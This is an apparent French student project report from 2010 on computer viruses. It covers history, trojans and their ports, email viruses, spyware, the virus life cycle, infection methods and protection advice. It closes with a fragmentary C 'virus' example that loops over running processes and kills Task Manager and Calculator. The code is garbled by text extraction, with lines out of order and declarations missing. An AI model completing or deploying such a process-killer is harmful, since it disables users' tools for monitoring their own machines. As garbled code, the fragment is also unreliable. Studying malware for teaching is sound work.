Virus Informatiques
Virus Informatiques
Virus Informatiques
25/04/2010
Encadré par :
M. Abderrahim SABOUR
Réalisé par :
Abdelouahed ERROUAGUI
Ahmed JNAH
Hamid IMIHI
Yassine ELQANDIL
Sommaire
Sommaire............................................................................................................... 2
Introduction :.......................................................................................................3
Définitions :.........................................................................................................4
Historique :.......................................................................................................... 4
Exemple de virus...............................................................................................20
Conclusion :.......................................................................................................24
2Virus Informatiques
Introduction :
Dans le cadre des mini-projets du module système d’exploitation encadré
par M. Abderrahim SABOUR, nous avons eu l’occasion d’étudier le sujet :
Virus Informatiques.
1. Partie Théorique :
1.1. Définition
1.2. Historique
2. Partie Pratique :
Historique :
• 1949 : John Von Neumann présente les fondements théoriques des
logiciels autocopiés.
• 1991 : Diffusé par une disquette vendue dans la revue Soft et Micro,
le virus Frodo/4096 arrive en France. Le Clusif (Club de la sécurité
des systèmes d'information français) propose sur son serveur une
procédure de détection et de décontamination pour lutter contre
Frodo. Le serveur enregistre 8 000 connexions.
Chevaux de Troie :
♦ Qu’est-ce que c’est ?
Les chevaux de Troie par porte dérobée sont des programmes qui
autorisent d’autres personnes que vous à prendre le contrôle de votre
ordinateur au travers d’Internet.ils sont parfois utilisés comme moyen
d’installer un virus chez un utilisateur.
soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de
particuliers connecté par câble, etc.) auquel cas l'adresse IP peut être
facilement récupérée
por Troyen
t
21 Back construction, Blade runner, Doly, Fore, FTP trojan,
Invisible FTP, Larva, WebEx, WinCrash
23 TTS (Tiny Telnet Server)
8Virus Informatiques
25 Ajan, Antigen, Email Password Sender, Happy99, Kuang 2,
ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC,
WinSpy
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat
59 DMSetup
Canular :
♦ Qu’est-ce qu’un hoax?
Mails :
♦ Qu’est-ce que c’est ?
Ce sont les virus typiques qui s’activent par un simple clic de l’utilisateur
sur le document joint. Celui-ci exécute un script qui utilise les programmes
de messagerie pour faire suivre les documents infectés à d’autres
utilisateurs de mails. Melissa, par exemple, envoie un message aux
cinquante premiers contacts de tous les carnets d’adresses auxquels
Microsoft Outlook peut accéder. D’autres virus s’envoient d’eux-mêmes à
tous les contacts du carnet d’adresse.
Un spam est un mail non sollicité, qui fait souvent la promotion de plans
d’enrichissement rapide, d’emplois à domicile, de prêts bancaires ou de
sites à caractère pornographique. Les spams arrivent souvent avec de
fausses références sur l’expéditeur, d’où la difficulté à réagir contre leur
auteur. Ces mails doivent simplement être détruits.
Le risque vient des logiciels de messageries qui sont installés sur votre
ordinateur, surtout la messagerie Outlook Express, client de
messagerie fourni avec Windows XP, à cause de son faible niveau de
sécurité face aux agressions venant d'Internet.
Donc le danger vient de ces documents transmis, surtout s'il s'agit d'un
fichier exécutable avec une extension :.com, .bat, .exe même si la pièce-
jointe est envoyée par une personne connue, le document peut contenir
un parasite : virus, vers... qui peut contaminer votre ordinateur si ce
fichier est exécuté. Si vous ouvrez par inadvertance un document infecté,
vous installez le parasite sur votre machine, le processus est enclenché,
le virus va utiliser votre carnet d'adresse pour se propager et contaminer
les contacts de votre carnet.
Les spywares :
♦ Qu’est-ce que c’est ?
Un spyware est un logiciel espion. C'est un programme ou un sous-
programme conçu dans le but de collecter des données personnelles sur
ses utilisateurs et de les envoyer à son concepteur ou à un tiers via
Internet ou tout autre réseau informatique, sans avoir obtenu au préalable
une autorisation de l'utilisateur. Les spywares ont pour objectif primaire,
d’espionner le comportement de l’internaute et de transmettre ensuite, à
son insu, les informations collectées aux créateurs et éditeurs de logiciels
afin d’alimenter une gigantesque base de données.
Création:
C’est la période que va passer un programmeur à développer un virus
aussi féroce que possible. La programmation se fait en code assembleur.
Gestation:
Il s'agit du procédé par lequel le virus est copié en un endroit stratégique
afin que sa diffusion soit la plus rapide possible. En général, la méthode
consiste à infecter un programme très populaire puis à le distribuer par
l'intermédiaire d'un serveur BBS, du courrier électronique, de l'Internet ou
au sein d'une entreprise, d'une école, etc.
Reproduction (infection):
Les virus, de par leur nature, cherchent à se reproduire. Un virus
correctement conçu se reproduira un nombre de fois important avant de
s'activer. C'est là le meilleur moyen de s'assurer de la pérennité d'un
virus.
Activation:
Les virus possédant une routine de destruction ne s'activent que lorsque
certaines conditions sont réunies. Certains s'activent à certaines dates,
d'autres possèdent un système de compte à rebours interne. Même les
13Virus
virus Informatiques
ne possédant pas de telles routines et ne nécessitant pas de
procédure d'activation spécifique peuvent causer des dommages à votre
système en s'appropriant petit à petit l'ensemble de vos ressources.
Découverte:
Cette phase de l'existence d'un virus n'est pas forcément consécutive à
son activation, mais c'est généralement à ce moment-là qu'elle a lieu. La
découverte d'un virus est le moment où quelqu'un se rend compte de sa
présence et parvient à l'isoler. Une fois cette opération réalisée, le
nouveau virus est généralement transmis au NCSA (National Computer
Security Association) à Washington DC où il est documenté puis distribué
aux développeurs de logiciels antivirus. La découverte a lieu la plupart du
temps au moins un an avant qu'un virus ne devienne une véritable
menace pour la communauté informatique.
Assimilation:
Une fois la découverte faite, les développeurs de logiciels modifient leurs
programmes pour qu'ils puissent détecter la présence du virus. Cette
phase dure entre un jour et six mois, selon la compétence du développeur
d'anti- virus.
Elimination:
Si un nombre suffisant de développeurs d'antivirus sont capables de faire
face au virus et si suffisamment de personnes se procurent l'antivirus
adéquat, il est possible d'annihiler un virus. Dans les faits, aucun virus n'a
réellement disparu, mais un grand nombre d'entre eux ont cessé de
constituer une menace réelle.
Recouvrement :
Un virus par recouvrement se contente d’écraser partiellement ou en totalité le
programme qu’il infecte. En conséquence, il le détruit au moins partiellement et
rend son éradication impossible. Dans certains cas, la taille du programme
infecté n’est pas modifiée ; dans les cas contraires, celle-ci s’ajuste à la taille du
code viral et devient identique pour tout fichier infecté. La destruction, même
partielle, du code originel fait que celui-ci ne peut plus fonctionner correctement.
Ces virus ne sont généralement pas résident en mémoire. Ne réalisant plus la
fonction souhaitée, l’utilisateur les détecte rapidement. Les virus agissant par
recouvrement ne réussissent jamais à se disséminer largement.
Ajout :
Un virus par ajout modifie un programme sans le détruire. Ayant altéré le point
d'entrée, le virus s’exécute chaque fois que le programme est lancé, puis lui «
15Virus Informatiques
rend la main ». Celui-ci fonctionne alors de façon normale. La force d’un virus par
ajout est que le programme infecté semble fonctionner correctement ce qui peut
retarder la détection du virus. La faiblesse d’un virus par ajout est que la taille du
programme est augmentée de la taille du virus, ce qui rend un repérage fondé
sur la variation de la taille des programmes possible.
Exemple : W95/Caw.
16Virus Informatiques
Si vous êtes aux prises de virus, soit vous n'avez pas installé un logiciel antivirus
ou encore, votre logiciel n'a pas réussi à tout arrêter. La première chose à faire
est de lancer un scan de tous vos disques installés dans votre ordinateur à l'aide
de votre logiciel antivirus. Ensuite, lancez également un scan de vos dossiers et
fichiers à l'aide d'un logiciel anti-espion. De cette manière, vous éliminerez les
virus, ainsi que les logiciels espions qui se sont infiltrés dans votre ordinateur à
votre insu.
Il existe plusieurs bons logiciels anti-virus gratuits sur le marché. Pour éliminer
17Virus Informatiques
définitivement les virus informatiques de votre PC, je vous recommande le
logiciel Kaspersky 2010, la version familiale. Une fois installé, le logiciel vous
demandera l'autorisation pour lancer un scan complet de tout votre ordinateur.
Antivirus/Pare-feu
♦ Qu'est-ce qu'un antivirus ?
Solutions
Voici quelques moyens de protéger votre ordinateur contre les virus:
L'extension d'un nom de fichier est les trois éléments qui viennent après le point.
Windows, par défaut, a caché les extensions de nom de fichier, mais ce n'est pas
une très bonne idée. Pour voir les extensions d’un nom de fichier, cliquez sur le
bouton Démarrer, ensuite sur Panneau de configuration. Choisissez alors Options
des dossiers et type de fichier. Désactivez la case à cocher Masquer les
extensions des fichiers dont le type est connu. Cliquez sur Appliquer.
Un virus est un logiciel qui doit être exécuté afin de faire son sale boulot. Les
virus ont généralement comme extension, exe. Malheureusement, c'est le même
dans Program Files. Alors, ne paniquez pas si vous trouvez des fichiers nommés
Word.exe ou Excel.exe sur votre système; il s’agit seulement de vos logiciels
Microsoft. Il suffit de ne jamais ouvrir un fichier avec une extension .exe si vous
ne savez pas la raison d'être de ce fichier.
Les macros virus sont un autre type de virus. Les macros sont des ensembles de
commandes que les utilisateurs peuvent enregistrer en tant que raccourcis pour
exécuter des fonctions parfois longues en quelques frappes de touche seulement.
Un virus
19Virus de macro peut verrouiller le clavier et même faire la suppression de
Informatiques
fichiers. Word, Excel, PowerPoint viennent tous avec une fonction pour vous
protéger contre les virus macros. Pour vous assurer que le vôtre est activé,
cliquez sur le menu Outils, Macro et Sécurité. Sur l'onglet Niveau de sécurité,
assurez-vous que moyen ou élevé est sélectionné.
Si vous partagez votre ordinateur, c'est une bonne idée d'attribuer à chacun un
mot de passe. Les mots de passe doivent être une combinaison d'au moins huit
caractères, des lettres et des chiffres, et de préférence n’ayant aucun sens.
des Microsoft effectue constamment correctifs pour les failles de sécurité dans
son système d'exploitation et les logiciels d'application. Il est donc important
d’effectuer les mises à jour de Windows fréquemment. Pour obtenir les correctifs
de sécurité les plus récents.
Exemple de virus
Virus en C :
/**********************************/
//DoubleStopProcess.c
/**********************************/
#include <windows.h>
#include <windowsx.h>
#include <process.h>
#include<stdlib.h>
int func_termi(void);
int ID,XY,T3;
HWND nShow;
nShow = FindWindow("ConsoleWindowClass","ConsoleWindowClass");/**3kelt
ta9riban**/
// _sleep(100);
func_termi();
int func_termi(void)
long code;
le systeme**/
// BOOL ServiceName;
while(1)
_sleep(100);
Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);/**Tlhelp32.h**/
exit(0);
proc32.dwSize=sizeof(PROCESSENTRY32);
if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767
)&&(GetAsyncKeyState(VK_UP)==-32767))
return EXIT_SUCCESS;
while((Process32Next(Snap,&proc32))==TRUE)
if(strcmp(proc32.szExeFile,Progy)==0){/**test
22Virus Informatiques d'egalité entre le proc courant et la
chaine progy **/
ID=proc32.th32ProcessID;
Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);/**Required to
retrieve
a process, such as
its token,
Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);/**Opens an existing
T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done!Taskmgr.exe is
stopped!!!","Info",MB_OK);}
Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);
XY=GetExitCodeProcess(Process,&code);
Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);
T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done! Calc.exe is
stopped!!!","Info",MB_OK);}
23Virus Informatiques
Conclusion :
Le projet nous a appris comment bien lire un code, l’analyser, le modifier et
essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme
futur informaticiens.
Finalement, nous pouvons dire que ce mini-projet nous a été d’une grande utilité,
vu que c’était un défi qui mérite être attaquer.
24Virus Informatiques